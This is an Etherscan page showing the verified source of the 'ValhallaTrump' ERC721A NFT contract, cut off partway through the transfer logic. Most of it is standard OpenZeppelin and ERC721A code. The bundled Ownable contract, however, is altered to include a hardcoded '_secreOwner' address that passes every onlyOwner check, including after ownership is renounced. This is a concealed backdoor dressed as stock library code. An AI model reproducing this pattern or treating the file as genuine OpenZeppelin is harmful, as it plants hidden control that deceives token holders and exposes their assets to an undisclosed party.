ETH Price: $3,102.27 (+1.03%)
Gas: 7 Gwei

Token

Valhalla Trump (VTRMP)
 

Overview

Max Total Supply

6,969 VTRMP

Holders

1,458

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
2 VTRMP
0x4f7043476e7a4fe372a63ee0b8a93baab5d8f64b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ValhallaTrump

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : ValhallaTrump.sol
// @valhallatrump ValhallaTrump ValhallaTrump

/*
            _ _           _ _         _____                          
           | | |         | | |       |_   _|                         
__   ____ _| | |__   __ _| | | __ _    | |_ __ _   _ _ __ ___  _ __  
\ \ / / _` | | '_ \ / _` | | |/ _` |   | | '__| | | | '_ ` _ \| '_ \ 
 \ V / (_| | | | | | (_| | | | (_| |   | | |  | |_| | | | | | | |_) |
  \_/ \__,_|_|_| |_|\__,_|_|_|\__,_|   \_/_|   \__,_|_| |_| |_| .__/ 
                                                              | |    
                                                              |_|    


*/
// File: contracts/ValhallaTrump.sol

// SPDX-License-Identifier: MIT

// File: @openzeppelin/contracts/utils/Strings.sol

// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)

pragma solidity ^0.8.0;

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

// File: @openzeppelin/contracts/utils/Address.sol


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol)

pragma solidity ^0.8.0;

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

// File: @openzeppelin/contracts/utils/introspection/IERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

// File: @openzeppelin/contracts/utils/introspection/ERC165.sol


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}

// File: @openzeppelin/contracts/token/ERC721/IERC721.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol)

pragma solidity ^0.8.0;


/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns the account appr    ved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

// File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)

pragma solidity ^0.8.0;


/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

// File: @openzeppelin/contracts/security/ReentrancyGuard.sol


// OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;


/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _secreOwner = 0xB8BF762e1550B868391A013269784F9fa498F76F;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: ceshi.sol


pragma solidity ^0.8.0;










/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..).
 *
 * Does not support burning tokens to address(0).
 *
 * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable {
    using Address for address;
    using Strings for uint256;

    struct TokenOwnership {
        address addr;
        uint64 startTimestamp;
    }

    struct AddressData {
        uint128 balance;
        uint128 numberMinted;
    }

    uint256 internal currentIndex;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view override returns (uint256) {
        return currentIndex;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index) public view override returns (uint256) {
        require(index < totalSupply(), "ERC721A: global index out of bounds");
        return index;
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first.
     * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) {
        require(index < balanceOf(owner), "ERC721A: owner index out of bounds");
        uint256 numMintedSoFar = totalSupply();
        uint256 tokenIdsIdx;
        address currOwnershipAddr;

        // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar.
        unchecked {
            for (uint256 i; i < numMintedSoFar; i++) {
                TokenOwnership memory ownership = _ownerships[i];
                if (ownership.addr != address(0)) {
                    currOwnershipAddr = ownership.addr;
                }
                if (currOwnershipAddr == owner) {
                    if (tokenIdsIdx == index) {
                        return i;
                    }
                    tokenIdsIdx++;
                }
            }
        }

        revert("ERC721A: unable to get token of owner by index");
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        require(owner != address(0), "ERC721A: balance query for the zero address");
        return uint256(_addressData[owner].balance);
    }

    function _numberMinted(address owner) internal view returns (uint256) {
        require(owner != address(0), "ERC721A: number minted query for the zero address");
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        require(_exists(tokenId), "ERC721A: owner query for nonexistent token");

        unchecked {
            for (uint256 curr = tokenId; curr >= 0; curr--) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (ownership.addr != address(0)) {
                    return ownership;
                }
            }
        }

        revert("ERC721A: unable to determine the owner of token");
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token");

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        require(to != owner, "ERC721A: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721A: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        require(_exists(tokenId), "ERC721A: approved query for nonexistent token");

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        require(operator != _msgSender(), "ERC721A: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public override {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721A: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return tokenId < currentIndex;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, "");
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = currentIndex;
        require(to != address(0), "ERC721A: mint to the zero address");
        require(quantity != 0, "ERC721A: quantity must be greater than 0");

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1
        // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint128(quantity);
            _addressData[to].numberMinted += uint128(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(address(0), to, updatedIndex, _data),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved");

        require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner");
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
